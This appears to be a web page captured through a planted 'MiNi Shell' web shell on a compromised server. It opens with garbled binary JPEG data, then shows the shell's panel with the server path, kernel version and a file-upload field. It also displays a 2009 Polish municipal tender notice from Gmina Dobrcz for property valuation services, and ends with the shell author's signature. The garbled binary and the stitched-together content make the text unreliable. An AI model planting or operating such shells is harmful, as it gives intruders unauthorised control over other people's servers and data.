JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090730/123123-N-2009.html

<p class="kh_header"><b>Dobrcz: Przedmiotem zamówienia jest wykonanie usług rzeczoznawców majątkowych z zakresu szacowania nieruchomości na terenie gminy Dobrcz.</b><br>
<b>Numer ogłoszenia: 123123 - 2009; data zamieszczenia: 30.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobrcz , ul. Długa 50, 86-022 Dobrcz, woj. kujawsko-pomorskie, tel. 052 3648010, faks 052 3648032.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dobrcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie usług rzeczoznawców majątkowych z zakresu szacowania nieruchomości na terenie gminy Dobrcz..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający udziela zamówienia w częściach, dopuszczając składanie przez Wykonawców ofert częściowych wg poniższego zestawienia :

Zadanie 1
Wykonanie wyceny nieruchomości - gruntu dla celów opłaty planistycznej z tytułu wzrostu wartości nieruchomości w związku ze zmianą przeznaczenia w miejscowym planie zagospodarowania przestrzennego.
Zadanie 2
Wykonanie wyceny nieruchomości - gruntu dla celów ustalenia opłaty adiacenckiej z tytułu   wzrostu wartości nieruchomości, w związku z wybudowaniem urządzenia infrastruktury technicznej.
Zadanie 3
Wykonanie wyceny nieruchomości - gruntu dla celu ustalenia opłaty adiacenckiej z tytułu wzrostu      wartości nieruchomości w związku z jej podziałem.
Zadanie  4
     Wykonanie wyceny działek niezabudowanych przeznaczonych do zbycia.
     Zadanie 5
     Wykonanie wyceny gruntów rolnych.
     Zadanie 6
     Wycena gruntu do zmiany opłat rocznych wieczystego użytkowania.
     Zadanie 7
     Wycena gruntu do określenia wartości celem sprzedaży oraz przekształcenia prawa  
     użytkowania  wieczystego w prawo własności.
     Zadanie 8
     Wycena nieruchomości lokalowych przeznaczonych do sprzedaży dotychczasowym   
     najemcom wraz z inwentaryzacją. 
     Zadanie 9
     Wycena budynku z jednym lokalem mieszkalnym przeznaczonym do sprzedaży   
     dotychczasowym najemcom wraz z wydzieloną działką.
     Zadanie 10
     Wycena nieruchomości lokalowych przeznaczonych do sprzedaży dotychczasowym najemcom 
     bez inwentaryzacji.
     Zadanie 11
     Inwentaryzacja lokali mieszkalnych wraz z pomieszczeniami przynależnymi.
     Zadanie 12
     Wycena budynków gospodarczych i garaży wraz z przynależnym gruntem oraz inwentaryzacją.
     Zadanie 13
     Wycena gruntów związanych z wydzielonymi nieruchomościami lokalowymi.
     Zadanie 14
     Aktualizacja wycen z poprzedniego roku.

Oferta złożona na realizację danego zadania winna obejmować cały jego zakres.
Przedmiot zamówienia ma być wykonany zgodnie z wymogami zawartymi w Specyfikacji istotnych warunków zamówienia oraz zgodnie z przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tj. w Dz.U. z 2004 r, Nr 261, poz. 2603 z późn. zm.)i rozporządzeniem Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. z dnia 22 września 2004 r. Nr 207, poz. 2109)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 9.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone       
      w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych Dz. U. z 2006 r. Nr 164, poz.1163 i Nr 170, poz. 1217 oraz w SIWZ.
Za spełniających  warunki uznaje się Wykonawców, którzy :
-	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień /posiadają uprawnienia zawodowe w zakresie szacowania nieruchomości i prawo do samodzielnych funkcji w tym zakresie/,
-	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia /dysponują takim potencjałem technicznym i dysponują tyloma osobami zdolnymi do wykonania poszczególnych części przedmiotu zamówienia, aby nie uchybić terminowi określonemu na wykonanie poszczególnych operatów/,
-	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
-	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.

Art. 23 uPzp dopuszcza możliwość składania jednej oferty przez dwa lub więcej  podmiotów jednak pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
a)	grupa podmiotów (wykonawców) powinna składać się z podmiotów, których działalność obejmuje: działalność w przedmiocie zamówienia,
b)	wykonawcy przedłożą, wraz z ofertą, umowę przewidującą sposób ich współdziałania, oraz solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia (umowy),
c)	w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z wykonawców oddzielnie musi udokumentować, że nie podlega wykluczeniu na podst. art. 24 uPzp,
d)	oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie,
e)	w przypadku wspólnego ubiegania się o zamówienie publiczne, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy, 
f)	oferenci występujący wspólnie muszą upoważnić na piśmie pod rygorem nieważności (art.99 § 2 K.c) swojego przedstawiciela jako przedstawiciela pozostałych, a jego upoważnienie musi być udokumentowane pełnomocnictwem przez upełnomocnionych przedstawicieli wszystkich pozostałych wykonawców, przy czym  stroną umowy stają się (czyli podpisują) wszystkie podmioty składające jedną wspólną ofertę jeżeli uczestnicy ustanowią pełnomocnika do reprezentowania ich tylko  w postępowaniu o udzielenie zamówienia,
g)	wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako reprezentant pozostałych, przy czym uregulowanie płatności następować będzie wprost na konto danego podmiotu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać niżej wymienione dokumenty w oryginale lub poświadczone  za zgodność z oryginałem ich kserokopie przez osobę/y uprawnioną/e do reprezentowania oferenta i składania oświadczeń woli w jego imieniu, wskazaną  w dokumencie rejestrowym Wykonawcy albo przez osobę umocowaną w sposób właściwy do dokonania czynności poświadczenia dokumentów za zgodność z oryginałem: 
1)	Wypełniony formularz oferty zawierający oświadczenie wykonawcy o spełnianiu wymaganych art. 22 ust. 1 uPzp warunków udziału  w postępowaniu oraz, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 uPzp (wg wzoru Zamawiającego, stanowiący zalącznik nr 1).
	W przypadku wspólnego ubiegania się /konsorcjum/ oświadczenie składa każdy z Wykonawców oddzielnie.
2)	Dokument potwierdzający posiadanie żądanych uprawnień zawodowych.
3)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4)	Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia.
5)	Umowa regulująca współpracę podmiotów występujących wspólnie.
Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, lub którzy złożyli dokumenty zawierające błędy do uzupełnienia tych dokumentów w określonym terminie, chyba że mimo ich uzupełnienia konieczne byłoby odrzucenie oferty lub unieważnienie postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dobrcz.bip.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dobrcz, 86-022 Dobrcz, ul. Długa 50 (budynek USC pokój nr 4).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2009 godzina 10:00, miejsce: Urząd Gminy Dobrcz, 86-022 Dobrcz, ul. Długa 50, pokój nr 14 (sekretariat), I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com